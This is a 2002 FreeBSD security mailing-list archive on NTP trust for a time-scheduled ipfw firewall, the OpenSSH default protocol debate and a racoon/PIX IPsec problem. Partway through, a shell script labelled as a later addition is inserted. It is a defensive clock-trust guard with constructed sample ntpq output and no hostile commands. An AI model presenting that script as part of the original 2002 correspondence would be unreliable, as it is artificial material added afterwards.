Subject: NTP security - (was Any security issues with root's cron job?)
To: Brian Reichert, Kim Okasawa
Cc: _@r4k.net, freebsd-security@freebsd.org

The way we skirt the issue of having our own secure source is to get
our border routers to poll a couple of servers on the internet and then
the servers can poll them. There are a number of possible attacks on
this, but we're not getting 20 grand for our own source anytime soon
and at least this way we can pin-hole the access-lists.
And since we're running beefy border routers, any DoS based on amount
of traffic would be less likely to work.

I'm open to ideas.

--- Brian Reichert wrote:
> On Sat, Jul 06, 2002 at 05:07:06AM +0900, Kim Okasawa wrote:
> > >From: Stephanie Wehner <_@r4k.net>
> > >To: Kim Okasawa
> > >Subject: Re: Any security issues with root's cron job?
> > >Date: Wed, 3 Jul 2002 16:48:37 +0200
> > >
> > >Hi Kim,
> > >
> > > > Can anyone think of any potential security risks to such practice?
> > > >Any suggestions and comments are greatly appreciated. Thank you!
> > >
> > >Not from the cronjob directly, however why would you want to change
> > >your ipfw rule set according to time ?
> > >
> > >What I would check in this case is how your machine keeps time,
> > >e.g. it must be rather accurate. Also, by getting timing information
> > >from a remote ntp server for example would then mean you place your
> > >firewall rules pretty much into their hands.
> > >
> >
> > Hi Stephanie:
> >
> > Good thinking. You are absolutely right! The time should be rather
> > accurate in order for this to function correctly. How about letting the
> > server run its ntp service? Clients who want to access the server
> > would have to sync with it if necessary. But this means that the firewall
> > needs to open the ntp port and may create other problems.
>
> You don't _need_ a NTP server on your vault if you have access to
> one that you trust. I feel that most institutions should set up a
> peered set of stratum-3 servers, out of hand, and sync internal
> hosts to those; this cuts down on network traffic, if nothing else.
>
> (You could even force them to use your time server(s) via divert.)
>
> If your vault is to merely be an NTP client, then it will poll your
> time server(s); you can firewall out spoofed replies.
>
> If your time server is also to be a NTP server, then it will need
> to be able to serve requests from your LAN.
>
> These are both easily locked down via ipfw.
>
> >
> > What I want is to create a virtual timed vault that only allows the world to
> > access certain services within a specific period of time. In my case,
> > some services/ports don't need to be available to the public from 8PM-8AM.
> > Closing those ports may mean less trouble.
> >
> > Any suggestion on how to deal with the ntp problem? Thanks.
> >
> > Best Regards,
> > Kim
> >
>
> --
> Brian 'you Bastard' Reichert
> 37 Crystal Ave. #303 Daytime number: (603) 434-6842
> Derry NH 03038-1713 USA Intel architecture: the left-hand path

=====
-----------------------------------------------------------
All warfare is based on deception.
-----------------------------------------------------------

From owner-freebsd-security Fri Jul 5 21:23: 3 2002
Date: Sat, 6 Jul 2002 13:52:13 +1000 (EST)
From: Ross Wheeler
To: twig les
Cc: Brian Reichert, Kim Okasawa, <_@r4k.net>
Subject: Re: NTP security - (was Any security issues with root's cron job?)

> The way we skirt the issue of having our own secure
> source is to get our border routers to poll a couple
> of servers on the internet and then the servers can
> poll them. There are a number of possible attacks on
> this, but we're not getting 20 grand for our own
> source anytime soon

> I'm open to ideas.

Whip over to ebay, buy a cheap second-hand GPS and cable, stick it into
one of your servers and presto - instant "stratum 1" time reference for
under a hundred bucks. Under your control (I can't see anyone taking over
or DoSing the whole of the GPS network any time soon, do you?)
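
Added example, not part of any message in this thread: a guard for the time-of-day ipfw cron job discussed above, which treats the clock as usable only when several NTP sources (GPS refclock or polled servers) agree, and otherwise keeps the scheduled ports closed. The thresholds, function names and sample `ntpq -pn` output are assumptions made for illustration; the 08:00-20:00 window follows the 8PM-8AM closure described in the thread.

```shell
#!/bin/sh
# Guard for a time-of-day firewall cron job: trust the clock only when
# several NTP sources agree, otherwise keep the scheduled ports closed.

MIN_SOURCES=2       # assumed policy: reachable, agreeing sources required
MAX_OFFSET_MS=500   # assumed policy: largest tolerated |offset| in ms

# Constructed sample: GPS refclock plus two external peers, all agreeing.
SAMPLE_OK='     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*127.127.20.0    .GPS.            0 l   12   64  377    0.000    0.412   0.031
+192.0.2.10      198.51.100.1     2 u   33   64  377   18.204   -1.882   0.910
+203.0.113.7     198.51.100.9     2 u   40   64  377   22.871    2.105   1.204'

# Constructed sample: one peer is an hour off and tagged falseticker (x),
# the other has never answered (reach 0).
SAMPLE_SPLIT='     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*127.127.20.0    .GPS.            0 l   12   64  377    0.000    0.412   0.031
x192.0.2.10      198.51.100.1     2 u   33   64  377   18.204 3600012.5   0.910
 203.0.113.7     .INIT.          16 u    -   64    0    0.000    0.000   0.000'

# clock_is_trusted: reads an `ntpq -pn` peer billboard on stdin.
# Succeeds only if at least MIN_SOURCES reachable peers report an offset
# within MAX_OFFSET_MS and no reachable peer disagrees or is a falseticker.
clock_is_trusted() {
    awk -v min="$MIN_SOURCES" -v max="$MAX_OFFSET_MS" '
        $1 == "remote" || /^=+$/ || NF != 10 { next }  # header, ruler, junk
        $7 + 0 == 0 { next }              # reach 0: peer never answered
        {
            off = $9 + 0
            if (off < 0) off = -off
            if ($1 ~ /^x/ || off > max + 0) bad++; else good++
        }
        END { exit ((good >= min + 0 && bad == 0) ? 0 : 1) }
    '
}

# desired_state HOUR: prints "open" or "closed" for the scheduled services.
# Billboard comes on stdin. Any doubt about the clock fails closed, so a
# bad or spoofed time source can keep ports shut but cannot open them.
desired_state() {
    hour=${1#0}          # "08" -> "8", avoids octal surprises
    hour=${hour:-0}
    if ! clock_is_trusted; then
        echo closed
        return 0
    fi
    if [ "$hour" -ge 8 ] && [ "$hour" -lt 20 ]; then
        echo open
    else
        echo closed
    fi
}

# In the cron job (the rule changes themselves are site-specific):
#   state=$(ntpq -pn | desired_state "$(date +%H)")
```

An empty billboard (ntpq not running or not answering) also yields "closed".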

From owner-freebsd-security Fri Jul 5 21:41:44 2002
Date: Fri, 5 Jul 2002 22:41:26 -0600
From: "David G . Andersen"
To: twig les
Cc: Brian Reichert, Kim Okasawa, _@r4k.net, freebsd-security@FreeBSD.ORG
Subject: Re: NTP security - (was Any security issues with root's cron job?)
Message-ID: <20020705224126.A23004@cs.utah.edu>

twig les just mooed:
> The way we skirt the issue of having our own secure
> source is to get our border routers to poll a couple
> of servers on the internet and then the servers can
> poll them.
> There are a number of possible attacks on
> this, but we're not getting 20 grand for our own
> source anytime soon and at least this way we can
> pin-hole the access-lists. And since we're running
> beefy border routers, any DoS based on amount of
> traffic would be less likely to work.
>
> I'm open to ideas.

20 grand? Fear that. If you go for a cheap-o solution, you can
do it for ~$400. If you want a plug-and-go solution, I'd suggest:

  - For about $1000, buy a Praecis Ct from EndRun Technologies
    http://www.endruntechnologies.com/

    I have about 15 of them deployed right now. They pick GPS time
    from the CDMA cellular network. You can get 10 microsecond time
    inside of most machine rooms, without an external antenna.
    (If your cell phone works there, this probably will).
    US only
    Emulates a Trimble Palisade, plays very well with ntpd, requires
    no kernel changes.

  - For less than that, buy an Oncore UT+ eval kit from Synergy GPS
    (http://www.synergy-gps.com/)

    You want the UT+, not the other models, because this one's
    optimized for timekeeping. Has all the features you'll want,
    plays well with ntpd. For best results, requires
      options PPS_SYNC
    Works worldwide, requires antenna placement with a decent view of
    the sky. Once it's found itself, though, the UT+ can keep time
    with very few satellites, a definite bonus.

I have several of each of these in a "production" network (well, a
production distributed testbed), and I really like them both. The UT+
took a bit more work to set up, but if you get one, send me a note, and
I'll mail you the configuration stuff. It's really quite simple
overall. The EndRun boxes simply kick butt for use in the US.

With all of these, however, you'll still want to peer with some
external timeservers as a sanity check. I've had one occurrence when
the cellular network was broadcasting bad time.
It was fixed within an hour of when I reported it (it breaks hand-off),
and Verizon said it was the only one of their cellular towers that was
off, but it does happen. If you're doubly paranoid, do said sanity
checking with a source that'll do authentication with you.

  -Dave

-- 
work: dga@lcs.mit.edu    me: dga@pobox.com
MIT Laboratory for Computer Science    http://www.angio.net/

From owner-freebsd-security Fri Jul 5 21:44:19 2002
Date: Fri, 5 Jul 2002 22:44:06 -0600
From: "David G . Andersen"
To: Ross Wheeler
Cc: twig les, Brian Reichert, Kim Okasawa, _@r4k.net, freebsd-security@FreeBSD.ORG
Subject: Re: NTP security - (was Any security issues with root's cron job?)
Message-ID: <20020705224406.B23004@cs.utah.edu>

Ross Wheeler just mooed:
>
> Whip over to ebay, buy a cheap second-hand GPS and cable, stick it into
> one of your servers and presto - instant "stratum 1" time reference for

One thing to note with this approach is that you have to pick your GPS
carefully. Hand-helds often have really terrible time output; a friend
of mine used his PCMCIA GPS and was getting worse-than-NTP time from it.
If you can find it, look for a model that's optimized for time synch.
Trimble, UT+, etc. There's a good list of them in the NTP faq at
http://www.ntp.org/

> under a hundred bucks. Under your control (I can't see anyone taking over
> or DoSing the whole of the GPS network any time soon, do you?)

Certainly not to attack one internet site, at least. :)

  -Dave

-- 
work: dga@lcs.mit.edu    me: dga@pobox.com
MIT Laboratory for Computer Science    http://www.angio.net/

From owner-freebsd-security Sat Jul 6 4: 2:36 2002
Date: Sat, 6 Jul 2002 04:02:27 -0700 (PDT)
From: Jason Stone
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020706035731.N2631-100000@walter>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> > time to make the 2,1 the default instead ?
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

There is a whole lot of infrastructure surrounding ssh v1 keys out
there, and it will all break if you change the default to v2. With the
5.0-RELEASE on the not-too-distant horizon, I really think it best to
not change default behaviour within a major release.
Keep the default as it is - don't break people.

 -Jason

 -----------------------------------------------------------------------
 I worry about my child and the Internet all the time, even though she's
 too young to have logged on yet. Here's what I worry about. I worry
 that 10 or 15 years from now, she will come to me and say "Daddy, where
 were you when they took freedom of the press away from the Internet?"
        -- Mike Godwin

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: See https://private.idealab.com/public/jason/jason.gpg

iD8DBQE9Js5DswXMWWtptckRAu+0AJ98Q69nm9ks4eAFls+MV+YwmU8u/QCgxnsz
c4U9XMcfNuwCXvg2N9rd6fo=
=EICy
-----END PGP SIGNATURE-----

From owner-freebsd-security Sat Jul 6 6:21:29 2002
Date: Sat, 6 Jul 2002 15:14:35 +0200 (CEST)
From: Andrzej Kwiatkowski
To: freebsd-security@freebsd.org
Subject: subscribe freebsd-security
Message-ID: <20020706151419.O80433-100000@kwiatek.eu.org>

----------
Andrzej Kwiatkowski
tpinternet unix system administrator

From owner-freebsd-security Sat Jul 6 7:51:44 2002
Date: Sat, 6 Jul 2002 10:56:03 -0400 (EDT)
From: Dru
To: security@freebsd.org
Subject: no phase2 handle found
Message-ID: <20020706103414.X253-100000@x1-6-00-80-c8-3a-b8-46.kico2.on.cogeco.ca>

Didn't get any response from questions, so I'll try here.

Trying to set up an IPSEC tunnel between a PIX 501 and FreeBSD 4.6 using
the latest racoon. Phase 1 is successful and an ethereal analysis shows
that both are negotiating the same policy parameters. However, Phase 2
repeats endlessly with this message in /var/log/racoon.conf:

ERROR: isakmp_inf.c:776:isakmp_info_recv_n(): unknown notify message, no phase2 handle found.
The Phase 2 parameters on the PIX:

crypto ipsec transform-set vpn esp-des esp-md5-hmac
crypto dynamic-map bsd 100 set transform-set vpn
crypto dynamic-map bsd 100 set pfs group2
crypto dynamic-map bsd 100 set security-association lifetime seconds 3600 kilobytes 4608000

and in racoon:

pfs_group 2;
lifetime time 3600 sec;
encryption_algorithm des ;
authentication_algorithm hmac_md5;
compression_algorithm deflate;

I can only guess that negotiations are failing because of the compression algorithm; from what I can gather PIX only supports lzs but I'm unsure if compression is enabled or disabled by default. There are no (documented) knobs in the PIX IOS to enable/disable compression in the transform set.

I haven't had any luck getting setkey to use lzs and a google search shows one mailing list query which never received an answer. If I try:

add bsd_ip pix_ip 666 -C lzs;

I get a syntax error. I've been able to set the SPD to accept this as part of the policy

ipcomp/tunnel/pix_ip-bsd_ip/require;

but that still doesn't tell it to use lzs. racoon.conf accepts the lzs keyword but that didn't help either.

Any suggestions on where to go from here?

Also, the manpage for tcpdump has a -E option that works if tcpdump was compiled with cryptography enabled. How do I do this?
TIA, Dru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 10:52:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C53737B400 for ; Sat, 6 Jul 2002 10:52:26 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9CC8743E09 for ; Sat, 6 Jul 2002 10:52:25 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id A78995425; Sat, 6 Jul 2002 12:52:24 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g66HqNX00351; Sat, 6 Jul 2002 12:52:23 -0500 (CDT) (envelope-from hawkeyd) Date: Sat, 6 Jul 2002 12:52:23 -0500 (CDT) Message-Id: <200207061752.g66HqNX00351@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: <20020706035731.N2631-100000_walter@ns.sol.net> In-Reply-To: <20020706035731.N2631-100000_walter@ns.sol.net> From: hawkeyd@visi.com (D J Hawkey Jr) Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE X-Original-Newsgroups: sol.lists.freebsd.security To: jason-fbsd-security@shalott.net, freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <20020706035731.N2631-100000_walter@ns.sol.net>, jason-fbsd-security@shalott.net writes: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > >> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good >> > time to make the 2,1 the default instead ? 
>> >> I'd like that. I think the only reason for the old default was not to >> surprise users who had the ssh1 RSA host key in their known_hosts but >> not the ssh2 DSA host key. >> >> What do people think about this? Keep 2,1 or revert to 1,2? > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > and it will all break if you change the default to v2. "2,1" means "v2" with fallback to "v1". This shouldn't break anything, unless something's already broken in a system's v2 configuration. > -Jason Dave -- Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 11:28:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F9B537B400 for ; Sat, 6 Jul 2002 11:28:16 -0700 (PDT) Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id BAE2143E42 for ; Sat, 6 Jul 2002 11:28:15 -0700 (PDT) (envelope-from zvezdan@CS.WM.EDU) Received: from dali.cs.wm.edu (dali [128.239.26.26]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id g66IQHN13159 for ; Sat, 6 Jul 2002 14:26:17 -0400 (EDT) Received: (from zvezdan@localhost) by dali.cs.wm.edu (8.11.6/8.9.1) id g66IS9002684 for security@FreeBSD.ORG; Sat, 6 Jul 2002 14:28:09 -0400 Date: Sat, 6 Jul 2002 14:28:09 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020706142809.A2652@dali.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20020706035731.N2631-100000@walter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: 
<20020706035731.N2631-100000@walter>; from jason-fbsd-security@shalott.net on Sat, Jul 06, 2002 at 04:02:27AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Jul 06, 2002 at 04:02:27AM -0700, Jason Stone wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
>
> > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> > > time to make the 2,1 the default instead ?
> >
> > I'd like that. I think the only reason for the old default was not to
> > surprise users who had the ssh1 RSA host key in their known_hosts but
> > not the ssh2 DSA host key.
> >
> > What do people think about this? Keep 2,1 or revert to 1,2?
>
> There is a whole lot of infrastructure surrounding ssh v1 keys out there,
> and it will all break if you change the default to v2.
>

I usually keep silent but this really triggered me.
What do you mean when you say it will _all_ break?
I remember very well that the switching to v2 didn't involve too much.

The default in OpenSSH source is Protocol 2,1.
That doesn't exclude Protocol 1.
It only means that the client will try v2 first, and if it doesn't succeed it will fall back to v1. Thus, if your server doesn't want to talk v2 the client won't be able to use it and will work as v1.

For instance, an old Solaris server that's too slow to run v2 talks happily (v1 only) with 2,1 clients without any change.

If you do not want your client to talk v2 at all, is it really that difficult to roll a loop over your network and

echo " Protocol 1,2" >>/etc/ssh/ssh_config

on your clients?

> With the 5.0-RELEASE on the not-too-distant horizon, I really think it
> best to not change default behaviour within a major release. Keep the
> default as it is - don't break people.
>

Did you actually try this to claim so confidently that the switch will _break_ them so badly? My experience is not that bad.
-- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 12:40:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 02B3F37B400; Sat, 6 Jul 2002 12:40:42 -0700 (PDT) Received: from mail.tgd.net (mail.tgd.net [209.81.25.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id A9B4A43E09; Sat, 6 Jul 2002 12:40:41 -0700 (PDT) (envelope-from sean@mail.tgd.net) Received: by mail.tgd.net (Postfix, from userid 1001) id 48F1A20F01; Sat, 6 Jul 2002 12:40:40 -0700 (PDT) Date: Sat, 6 Jul 2002 12:40:40 -0700 From: Sean Chittenden To: Dag-Erling Smorgrav Cc: Trevor Johnson , Mike Tancsa , Ruslan Ermilov , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020706124040.D43307@ninja1.internal> References: <20020705094314.C73784-100000@blues.jpj.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from "des@ofug.org" on Fri, Jul 05, 2002 at = 04:11:01PM X-PGP-Key: 0x1EDDFAAD X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD X-Web-Homepage: http://sean.chittenden.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Use of protocol version 1 makes an insertion attack possible, according to > > . > > That same page also explains that OpenSSH contains code to make such > attacks very difficult. > > > The vulnerability was > > published by CORE SDI in June of 1998. I would like to see protocol > > version 1 disabled by default, with a note in UPDATING about the change. > > No. 
I will not arbitrarily lock users out of their machines. How about making it just proto 2 in -CURRENT and use that as the version to phase out proto 1. With all of the other security goodies going into 5.0, it seems like 5.0 would be shooting itself in the foot to have SSH1 enabled with HMAC and some of the other ACL fun. Besides, 5.0 seems like a nice transition point to begin phasing out SSH1. -sc -- Sean Chittenden To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 16:28:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 193E037B400 for ; Sat, 6 Jul 2002 16:28:22 -0700 (PDT) Received: from mail.lambertfam.org (www.lambertfam.org [216.223.196.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 90D4E43E4A for ; Sat, 6 Jul 2002 16:28:21 -0700 (PDT) (envelope-from lambert@lambertfam.org) Received: from localhost.localdomain (localhost [127.0.0.1]) by localhost.inch.com (Postfix) with ESMTP id 524D8350EE for ; Sat, 6 Jul 2002 19:26:32 -0400 (EDT) Received: from laptop.lambertfam.org (unknown [10.1.0.2]) by mail.lambertfam.org (Postfix) with ESMTP id 69B28350DB for ; Sat, 6 Jul 2002 19:26:28 -0400 (EDT) Received: by laptop.lambertfam.org (Postfix, from userid 1000) id 7DCE428B16; Sat, 6 Jul 2002 19:28:07 -0400 (EDT) Date: Sat, 6 Jul 2002 19:28:07 -0400 From: Scott Lambert To: freebsd-security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE Message-ID: <20020706232807.GA76607@laptop.lambertfam.org> Mail-Followup-To: freebsd-security@freebsd.org References: <20020706035731.N2631-100000_walter@ns.sol.net> <200207061752.g66HqNX00351@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200207061752.g66HqNX00351@sheol.localdomain> User-Agent: Mutt/1.3.99i Sender: 
owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Jul 06, 2002 at 12:52:23PM -0500, D J Hawkey Jr wrote:
> In article <20020706035731.N2631-100000_walter@ns.sol.net>,
> jason-fbsd-security@shalott.net writes:
> >> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> >> > time to make the 2,1 the default instead ?
> >> I'd like that. I think the only reason for the old default was not to
> >> surprise users who had the ssh1 RSA host key in their known_hosts but
> >> not the ssh2 DSA host key.
> >>
> >> What do people think about this? Keep 2,1 or revert to 1,2?
> >
> > There is a whole lot of infrastructure surrounding ssh v1 keys out there,
> > and it will all break if you change the default to v2.
>
> "2,1" means "v2" with fallback to "v1". This shouldn't break anything,
> unless something's already broken in a system's v2 configuration.

Unless you only have a v1 authorized key. Then you have to go through and either change all your ssh invocations in your scripts to use the "-1" parameter or create v2 keys.

It sucks when your automated scripts don't run because of a new default. I'll live with it for my 20 hosts. Others, with bigger networks, have legitimate issues here.
-- Scott Lambert KC5MLE Unix SysAdmin lambert@lambertfam.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 16:34:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57A1337B400 for ; Sat, 6 Jul 2002 16:34:54 -0700 (PDT) Received: from klingon.borderworlds.dk (borderworlds.dk [193.162.142.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id A766943E4A for ; Sat, 6 Jul 2002 16:34:53 -0700 (PDT) (envelope-from dev-null@borderworlds.dk) Received: from borg.borderworlds.dk (localhost [127.0.0.1]) by klingon.borderworlds.dk (Postfix on SuSE Linux 7.2 (i386)) with ESMTP id DA464288C8 for ; Sun, 7 Jul 2002 01:34:51 +0200 (CEST) Received: by borg.borderworlds.dk (Postfix, from userid 500) id 2B3263B8037; Sun, 7 Jul 2002 01:34:51 +0200 (CEST) To: freebsd-security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE References: <20020706035731.N2631-100000_walter@ns.sol.net> <200207061752.g66HqNX00351@sheol.localdomain> <20020706232807.GA76607@laptop.lambertfam.org> From: Christian Laursen Reply-To: freebsd-security@freebsd.org Date: 07 Jul 2002 01:34:50 +0200 In-Reply-To: <20020706232807.GA76607@laptop.lambertfam.org> Message-ID: Lines: 21 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott Lambert writes: > On Sat, Jul 06, 2002 at 12:52:23PM -0500, D J Hawkey Jr wrote: > > In article <20020706035731.N2631-100000_walter@ns.sol.net>, > > >> What do people think about this? Keep 2,1 or revert to 1,2? 
> > >
> > > There is a whole lot of infrastructure surrounding ssh v1 keys out there,
> > > and it will all break if you change the default to v2.
> >
> > "2,1" means "v2" with fallback to "v1". This shouldn't break anything,
> > unless something's already broken in a system's v2 configuration.
>
> Unless you only have a v1 authorized key. Then you have to go through
> and either change all your ssh invocations in your scripts to use the "-1"
> parameter or create v2 keys.

Or you can just specify "Protocol 1,2" in /etc/ssh/ssh_config.

--
Best regards
Christian Laursen

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Jul 6 21:33:12 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A774E37B400 for ; Sat, 6 Jul 2002 21:33:08 -0700 (PDT)
Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50B4143E42 for ; Sat, 6 Jul 2002 21:33:08 -0700 (PDT) (envelope-from jason@shalott.net)
Received: (qmail 7516 invoked by uid 1000); 7 Jul 2002 04:33:02 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 Jul 2002 04:33:02 -0000
Date: Sat, 6 Jul 2002 21:33:02 -0700 (PDT)
From: Jason Stone
X-X-Sender:
To:
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
In-Reply-To: <20020706142809.A2652@dali.cs.wm.edu>
Message-ID: <20020706204840.C2631-100000@walter>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> > > What do people think about this? Keep 2,1 or revert to 1,2?
> >
> > There is a whole lot of infrastructure surrounding ssh v1 keys out there,
> > and it will all break if you change the default to v2.
> >
>
> I usually keep silent but this really triggered me.
> What do you mean when you say it will _all_ break?

Currently, people have scripts and cronjobs which use ssh v1 keys for regular maintenance, data collection, etc. Users have v1 keys widely deployed to all the machines they use, etc. This is what I mean by infrastructure.

When the default changes to v2, then when connections are made, v2 will be negotiated and the v1 keys will be ignored. So when users upgrade from 4.6 to 4.7, run their agent and try to login to remote machines, their keys won't be used. When admins upgrade from 4.6 to 4.7 on their networks, the maintenance scripts and cronjobs will suddenly stop working. This is what I mean by break.

Yes, it is possible to either generate new keys or edit the config files to get the old behaviour back. But users expect that if their systems work with the defaults in 4.x, they'll continue to work in 4.x.

> > With the 5.0-RELEASE on the not-too-distant horizon, I really think it
> > best to not change default behaviour within a major release. Keep the
> > default as it is - don't break people.
>
> Did you actually try this to claim so confidently that the switch will
> _break_ them so badly? My experience is not that bad.

No, no, you missed the point entirely - I'm not talking about functionality or stability, I'm talking about release engineering. We're all anxious to get rid of protocol v1, but a major change like that shouldn't happen within a major version of the OS. But people _do_ expect radical changes from one major version of the OS to another, and since 5.0 will be released soon, we should be content that v2 will be the default soon without our changing 4.x.
-Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9J8R+swXMWWtptckRArreAKCV30ZMxS2CyJpi4yB4N47rmTG3hQCgvCRN XruArVVYYB8LCuDEA7Hbogs= =Kena -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 21:56:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 401BB37B400 for ; Sat, 6 Jul 2002 21:56:13 -0700 (PDT) Received: from smtp016.mail.yahoo.com (smtp016.mail.yahoo.com [216.136.174.113]) by mx1.FreeBSD.org (Postfix) with SMTP id 012D743E52 for ; Sat, 6 Jul 2002 21:56:13 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 7 Jul 2002 04:56:12 -0000 Message-ID: 